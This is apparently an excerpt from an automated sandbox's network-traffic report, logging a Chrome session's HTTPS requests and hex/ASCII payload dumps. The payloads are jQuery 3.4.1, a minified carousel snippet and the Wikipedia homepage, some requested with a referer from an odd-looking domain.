                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 29 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69
                                                                                                                                                                Data Ascii: )t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];i


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.449766151.101.194.1374434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:03 UTC354OUTGET /jquery-3.4.1.js HTTP/1.1
                                                                                                                                                                Host: code.jquery.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:04 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 280364
                                                                                                                                                                Server: nginx
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                ETag: "28feccc0-4472c"
                                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Age: 1571517
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:04 GMT
                                                                                                                                                                X-Served-By: cache-lga21923-LGA, cache-ewr-kewr1740061-EWR
                                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                                X-Cache-Hits: 129, 0
                                                                                                                                                                X-Timer: S1732390564.177418,VS0,VE1
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 34 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 39 2d 30 35 2d 30 31 54 32 31
                                                                                                                                                                Data Ascii: /*! * jQuery JavaScript Library v3.4.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2019-05-01T21
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63
                                                                                                                                                                Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 72 6f 77 73 65 72 73 20 64 6f 6e 27 74 20 73 75 70 70 6f 72 74 20 74 68 65 20 22 6e 6f 6e 63 65 22 20 70 72 6f 70 65 72 74 79 20 6f 6e 20 73 63 72 69 70 74 73 2e 0a 09 09 09 09 2f 2f 20 4f 6e 20 74 68 65 20 6f 74 68 65 72 20 68 61 6e 64 2c 20 6a 75 73 74 20 75 73 69 6e 67 20 60 67 65 74 41 74 74 72 69 62 75 74 65 60 20 69 73 20 6e 6f 74 20 65 6e 6f 75 67 68 20 61 73 0a 09 09 09 09 2f 2f 20 74 68 65 20 60 6e 6f 6e 63 65 60 20 61 74 74 72 69 62 75 74 65 20 69 73 20 72 65 73 65 74 20 74 6f 20 61 6e 20 65 6d 70 74 79 20 73 74 72 69 6e 67 20 77 68 65 6e 65 76 65 72 20 69 74 0a 09 09 09 09 2f 2f 20 62 65 63 6f 6d 65 73 20 62 72 6f 77 73 69 6e 67 2d 63 6f 6e 74 65 78 74 20 63 6f 6e 6e 65 63 74 65 64 2e 0a 09 09 09 09 2f 2f 20 53 65 65 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                Data Ascii: rowsers don't support the "nonce" property on scripts.// On the other hand, just using `getAttribute` is not enough as// the `nonce` attribute is reset to an empty string whenever it// becomes browsing-context connected.// See https://
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 72 72 6f 72 20 74 6f 20 62 65 20 74 68 72 6f 77 6e 20 69 66 20 6e 6f 74 20 69 6e 63 6c 75 64 65 64 29 0a 09 09 72 65 74 75 72 6e 20 6e 65 77 20 6a 51 75 65 72 79 2e 66 6e 2e 69 6e 69 74 28 20 73 65 6c 65 63 74 6f 72 2c 20 63 6f 6e 74 65 78 74 20 29 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 34 2e 30 20 6f 6e 6c 79 0a 09 2f 2f 20 4d 61 6b 65 20 73 75 72 65 20 77 65 20 74 72 69 6d 20 42 4f 4d 20 61 6e 64 20 4e 42 53 50 0a 09 72 74 72 69 6d 20 3d 20 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 3b 0a 0a 6a 51 75 65 72 79 2e 66 6e 20 3d 20 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 0a 09 2f 2f 20 54 68 65 20 63 75 72 72 65 6e 74 20
                                                                                                                                                                Data Ascii: rror to be thrown if not included)return new jQuery.fn.init( selector, context );},// Support: Android <=4.0 only// Make sure we trim BOM and NBSPrtrim = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;jQuery.fn = jQuery.prototype = {// The current
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 69 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 65 6c 65 6d 2c 20 69 2c 20 65 6c 65 6d 20 29 3b 0a 09 09 7d 20 29 20 29 3b 0a 09 7d 2c 0a 0a 09 73 6c 69 63 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 20 73 6c 69 63 65 2e 61 70 70 6c 79 28 20 74 68 69 73 2c 20 61 72 67 75 6d 65 6e 74 73 20 29 20 29 3b 0a 09 7d 2c 0a 0a 09 66 69 72 73 74 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 20 30 20 29 3b 0a 09 7d 2c 0a 0a 09 6c 61 73 74 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 20 2d 31 20 29 3b 0a 09
                                                                                                                                                                Data Ascii: nction( elem, i ) {return callback.call( elem, i, elem );} ) );},slice: function() {return this.pushStack( slice.apply( this, arguments ) );},first: function() {return this.eq( 0 );},last: function() {return this.eq( -1 );
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 45 78 74 65 6e 64 20 74 68 65 20 62 61 73 65 20 6f 62 6a 65 63 74 0a 09 09 09 66 6f 72 20 28 20 6e 61 6d 65 20 69 6e 20 6f 70 74 69 6f 6e 73 20 29 20 7b 0a 09 09 09 09 63 6f 70 79 20 3d 20 6f 70 74 69 6f 6e 73 5b 20 6e 61 6d 65 20 5d 3b 0a 0a 09 09 09 09 2f 2f 20 50 72 65 76 65 6e 74 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 20 70 6f 6c 6c 75 74 69 6f 6e 0a 09 09 09 09 2f 2f 20 50 72 65 76 65 6e 74 20 6e 65 76 65 72 2d 65 6e 64 69 6e 67 20 6c 6f 6f 70 0a 09 09 09 09 69 66 20 28 20 6e 61 6d 65 20 3d 3d 3d 20 22 5f 5f 70 72 6f 74 6f 5f 5f 22 20 7c 7c 20 74 61 72 67 65 74 20 3d 3d 3d 20 63 6f 70 79 20 29 20 7b 0a 09 09 09 09 09 63 6f 6e 74 69 6e 75 65 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2f 20 52 65 63 75 72 73 65 20 69 66 20 77 65 27 72 65 20
                                                                                                                                                                Data Ascii: Extend the base objectfor ( name in options ) {copy = options[ name ];// Prevent Object.prototype pollution// Prevent never-ending loopif ( name === "__proto__" || target === copy ) {continue;}// Recurse if we're
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 65 72 79 2e 74 79 70 65 20 74 6f 20 63 61 74 63 68 20 68 6f 73 74 20 6f 62 6a 65 63 74 73 0a 09 09 69 66 20 28 20 21 6f 62 6a 20 7c 7c 20 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 20 6f 62 6a 20 29 20 21 3d 3d 20 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 7d 0a 0a 09 09 70 72 6f 74 6f 20 3d 20 67 65 74 50 72 6f 74 6f 28 20 6f 62 6a 20 29 3b 0a 0a 09 09 2f 2f 20 4f 62 6a 65 63 74 73 20 77 69 74 68 20 6e 6f 20 70 72 6f 74 6f 74 79 70 65 20 28 65 2e 67 2e 2c 20 60 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 20 6e 75 6c 6c 20 29 60 29 20 61 72 65 20 70 6c 61 69 6e 0a 09 09 69 66 20 28 20 21 70 72 6f 74 6f 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 09 09 7d 0a 0a
                                                                                                                                                                Data Ascii: ery.type to catch host objectsif ( !obj || toString.call( obj ) !== "[object Object]" ) {return false;}proto = getProto( obj );// Objects with no prototype (e.g., `Object.create( null )`) are plainif ( !proto ) {return true;}
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 20 28 20 61 72 72 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 4f 62 6a 65 63 74 28 20 61 72 72 20 29 20 29 20 29 20 7b 0a 09 09 09 09 6a 51 75 65 72 79 2e 6d 65 72 67 65 28 20 72 65 74 2c 0a 09 09 09 09 09 74 79 70 65 6f 66 20 61 72 72 20 3d 3d 3d 20 22 73 74 72 69 6e 67 22 20 3f 0a 09 09 09 09 09 5b 20 61 72 72 20 5d 20 3a 20 61 72 72 0a 09 09 09 09 29 3b 0a 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 70 75 73 68 2e 63 61 6c 6c 28 20 72 65 74 2c 20 61 72 72 20 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 72 65 74 75 72 6e 20 72 65 74 3b 0a 09 7d 2c 0a 0a 09 69 6e 41 72 72 61 79 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 61 72 72 2c 20 69 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 61
                                                                                                                                                                Data Ascii: ( arr != null ) {if ( isArrayLike( Object( arr ) ) ) {jQuery.merge( ret,typeof arr === "string" ?[ arr ] : arr);} else {push.call( ret, arr );}}return ret;},inArray: function( elem, arr, i ) {return a
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 69 66 20 28 20 76 61 6c 75 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 09 09 72 65 74 2e 70 75 73 68 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 65 76 65 72 79 20 6b 65 79 20 6f 6e 20 74 68 65 20 6f 62 6a 65 63 74 2c 0a 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 66 6f 72 20 28 20 69 20 69 6e 20 65 6c 65 6d 73 20 29 20 7b 0a 09 09 09 09 76 61 6c 75 65 20 3d 20 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 2c 20 61 72 67 20 29 3b 0a 0a 09 09 09 09 69 66 20 28 20 76 61 6c 75 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 09 09 72 65 74 2e 70 75 73 68 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 2f 2f 20 46 6c 61
                                                                                                                                                                Data Ascii: if ( value != null ) {ret.push( value );}}// Go through every key on the object,} else {for ( i in elems ) {value = callback( elems[ i ], i, arg );if ( value != null ) {ret.push( value );}}}// Fla
                                                                                                                                                                2024-11-23 19:36:04 UTC1378INData Raw: 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 73 2e 66 6f 75 6e 64 61 74 69 6f 6e 2f 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 39 2d 30 34 2d 30 38 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 20 77 69 6e 64 6f 77 20 29 20 7b 0a 0a 76 61 72 20 69 2c 0a 09 73 75 70 70 6f 72 74 2c 0a 09 45 78 70 72 2c 0a 09 67 65 74 54 65 78 74 2c 0a 09 69 73 58 4d 4c 2c 0a 09 74 6f 6b 65 6e 69 7a 65 2c 0a 09 63 6f 6d 70 69 6c 65 2c 0a 09 73 65 6c 65 63 74 2c 0a 09 6f 75 74 65 72 6d 6f
                                                                                                                                                                Data Ascii: zzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://js.foundation/ * * Date: 2019-04-08 */(function( window ) {var i,support,Expr,getText,isXML,tokenize,compile,select,outermo


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.449768185.15.58.2264434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:04 UTC458OUTGET / HTTP/1.1
                                                                                                                                                                Host: wikipedia.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:05 UTC270INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Server: nginx/1.22.1
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:04 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 169
                                                                                                                                                                Connection: close
                                                                                                                                                                Location: https://www.wikipedia.org/
                                                                                                                                                                Strict-Transport-Security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                2024-11-23 19:36:05 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.449770185.15.58.2244434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:06 UTC462OUTGET / HTTP/1.1
                                                                                                                                                                Host: www.wikipedia.org
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:07 UTC1282INHTTP/1.1 200 OK
                                                                                                                                                                date: Fri, 22 Nov 2024 20:55:55 GMT
                                                                                                                                                                cache-control: s-maxage=86400, must-revalidate, max-age=3600
                                                                                                                                                                server: ATS/9.2.5
                                                                                                                                                                etag: W/"1869e-6258b4afc6240"
                                                                                                                                                                last-modified: Mon, 28 Oct 2024 15:40:49 GMT
                                                                                                                                                                content-type: text/html
                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                age: 81612
                                                                                                                                                                x-cache: cp6016 miss, cp6015 hit/1033682
                                                                                                                                                                x-cache-status: hit-front
                                                                                                                                                                server-timing: cache;desc="hit-front", host;desc="cp6015"
                                                                                                                                                                strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                set-cookie: WMF-Last-Access=23-Nov-2024;Path=/;HttpOnly;secure;Expires=Wed, 25 Dec 2024 12:00:00 GMT
                                                                                                                                                                set-cookie: WMF-Last-Access-Global=23-Nov-2024;Path=/;Domain=.wikipedia.org;HttpOnly;secure;Expires=Wed, 25 Dec 2024 12:00:00 GMT
                                                                                                                                                                x-client-ip: 8.46.123.75
                                                                                                                                                                set-cookie: GeoIP=US:NY:New_York:40.71:-74.01:v4; Path=/; secure; Domain=.wikipedia.org
                                                                                                                                                                set-cookie: NetworkProbeLimit=0.001;Path=/;Secure;SameSite=Lax;Max-Age=3600
                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                content-length: 99998
                                                                                                                                                                connection: close
                                                                                                                                                                2024-11-23 19:36:07 UTC13718INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 57 69 6b 69 70 65 64 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 69 6b 69 70 65 64 69 61 20 69 73 20 61 20 66 72 65 65 20 6f 6e 6c 69 6e 65 20 65 6e 63 79 63 6c 6f 70 65 64 69 61 2c 20 63 72 65 61 74 65 64 20 61 6e 64 20 65 64 69 74 65 64 20 62 79 20 76 6f 6c 75 6e 74 65 65 72 73 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 61 6e 64 20 68 6f 73 74 65 64 20 62 79 20 74 68 65 20 57 69 6b 69 6d 65 64 69 61 20
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en" class="no-js"><head><meta charset="utf-8"><title>Wikipedia</title><meta name="description" content="Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.449771185.15.58.2244434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:08 UTC341OUTGET / HTTP/1.1
                                                                                                                                                                Host: www.wikipedia.org
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:09 UTC1282INHTTP/1.1 200 OK
                                                                                                                                                                date: Fri, 22 Nov 2024 20:55:55 GMT
                                                                                                                                                                cache-control: s-maxage=86400, must-revalidate, max-age=3600
                                                                                                                                                                server: ATS/9.2.5
                                                                                                                                                                etag: W/"1869e-6258b4afc6240"
                                                                                                                                                                last-modified: Mon, 28 Oct 2024 15:40:49 GMT
                                                                                                                                                                content-type: text/html
                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                age: 81614
                                                                                                                                                                x-cache: cp6016 miss, cp6015 hit/1033725
                                                                                                                                                                x-cache-status: hit-front
                                                                                                                                                                server-timing: cache;desc="hit-front", host;desc="cp6015"
                                                                                                                                                                strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                set-cookie: WMF-Last-Access=23-Nov-2024;Path=/;HttpOnly;secure;Expires=Wed, 25 Dec 2024 12:00:00 GMT
                                                                                                                                                                set-cookie: WMF-Last-Access-Global=23-Nov-2024;Path=/;Domain=.wikipedia.org;HttpOnly;secure;Expires=Wed, 25 Dec 2024 12:00:00 GMT
                                                                                                                                                                x-client-ip: 8.46.123.75
                                                                                                                                                                set-cookie: GeoIP=US:NY:New_York:40.71:-74.01:v4; Path=/; secure; Domain=.wikipedia.org
                                                                                                                                                                set-cookie: NetworkProbeLimit=0.001;Path=/;Secure;SameSite=Lax;Max-Age=3600
                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                content-length: 99998
                                                                                                                                                                connection: close
                                                                                                                                                                2024-11-23 19:36:09 UTC13718INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 57 69 6b 69 70 65 64 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 69 6b 69 70 65 64 69 61 20 69 73 20 61 20 66 72 65 65 20 6f 6e 6c 69 6e 65 20 65 6e 63 79 63 6c 6f 70 65 64 69 61 2c 20 63 72 65 61 74 65 64 20 61 6e 64 20 65 64 69 74 65 64 20 62 79 20 76 6f 6c 75 6e 74 65 65 72 73 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 61 6e 64 20 68 6f 73 74 65 64 20 62 79 20 74 68 65 20 57 69 6b 69 6d 65 64 69 61 20
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en" class="no-js"><head><meta charset="utf-8"><title>Wikipedia</title><meta name="description" content="Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia
